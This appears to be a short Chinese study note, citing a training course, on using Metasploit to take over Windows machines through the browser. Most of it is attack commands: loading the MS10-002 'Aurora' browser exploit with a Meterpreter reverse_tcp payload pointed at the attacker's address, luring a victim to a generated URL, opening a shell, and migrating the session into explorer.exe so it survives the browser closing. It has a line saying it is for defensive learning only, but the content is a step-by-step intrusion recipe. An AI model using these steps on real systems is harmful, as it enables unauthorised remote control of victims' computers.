【笔记】msf通过浏览器获取shell

前言

msf通过浏览器获取Windows系统shell

本文仅用于网络信息防御学习

msf通过浏览器获取shell

  • ms10002:winxp的getshell漏洞
  • ms12063:win7的getshell漏洞

<ip_local>:配置攻击者地址

1
2
3
4
5
msf > use exploit/windows/browser/ms10_002_aurora
msf > set payload windows/meterpreter/reverse_tcp
msf > set SRVHOST <ip_local>
msf > set LHOST <ip_local>
msf > exploit
  • 执行攻击后,会得到一个网址,当受害者访问这个网址后,即可获取shell

1:会话编号

1
2
3
4
5
6
7
8
# 查看所有会话
msf > sessions -i

# 使用一个会话
msf > sessions -i 1

# 获取shell
meterpreter > shell
  • 由于受害者关闭浏览器进程后,会话会失效,所以可以移动会话绑定的进程,推荐绑定explorer.exe进程

<pid>:进程的pid

1
2
3
4
5
6
7
8
# 使用一个会话
msf > sessions -i 1

# 查看所有进程
meterpreter > ps

# 移动会话绑定的进程
meterpreter > migrate <pid>

完成

参考文献

哔哩哔哩——千锋教育网络安全学院